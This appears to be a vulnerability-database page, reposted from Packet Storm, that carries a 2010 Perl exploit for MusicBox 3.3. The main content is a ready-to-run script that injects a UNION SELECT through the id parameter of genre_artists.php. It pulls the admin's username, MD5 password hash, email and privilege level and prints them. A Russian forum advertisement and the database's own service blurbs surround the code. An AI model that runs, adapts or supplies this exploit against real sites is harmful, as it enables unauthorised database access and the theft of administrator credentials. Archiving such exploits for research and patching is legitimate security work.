Lucene search
K

MusicBox 3.3 SQL Injection

🗓️ 20 Apr 2010 00:00:00Reported by CtacokType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

MusicBox 3.3 SQL Injection, Exploit Title, Author, Version, Tested on, Code, Admin information extractio

Code
`  
  
# Exploit Title: MusicBox v 3.3 SQL INJECTION EXPLOIT  
# Date: 20.04.2010  
# Author: Ctacok  
# Version: 3.3  
# Tested on: Windows XP SP 2  
# Code:  
  
#!/usr/bin/perl   
use LWP::Simple;  
print "\n";  
print "##############################################################\n";  
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT #\n";  
print "# Author: Ctacok (Russian) #\n";  
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";  
print "##############################################################\n";  
print "\n Usage: exploit.pl [host] [path] ";  
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";  
print "\n userlevel 9 = SuperAdmin ";  
print "\n pass = md5($pass)";  
if (@ARGV < 2)  
{  
exit;  
}  
$host=$ARGV[0];  
$path=$ARGV[1];  
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+";  
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");  
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){  
print "\n[+] Admin id: : $1";  
print "\n[+] Admin username: $2";  
print "\n[+] Admin password: $3";  
print "\n[+] Admin email: $4";  
print "\n[+] Admin userlevel: $5";  
}else{  
print "\n My name is Fail, Epic Fail... \n"  
}  
_______________________________________________________________  
Проводится конкурс: Лучшей темы личного кабинета на NextMail  
Подробности здесь http://design2010.nextmail.ru  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation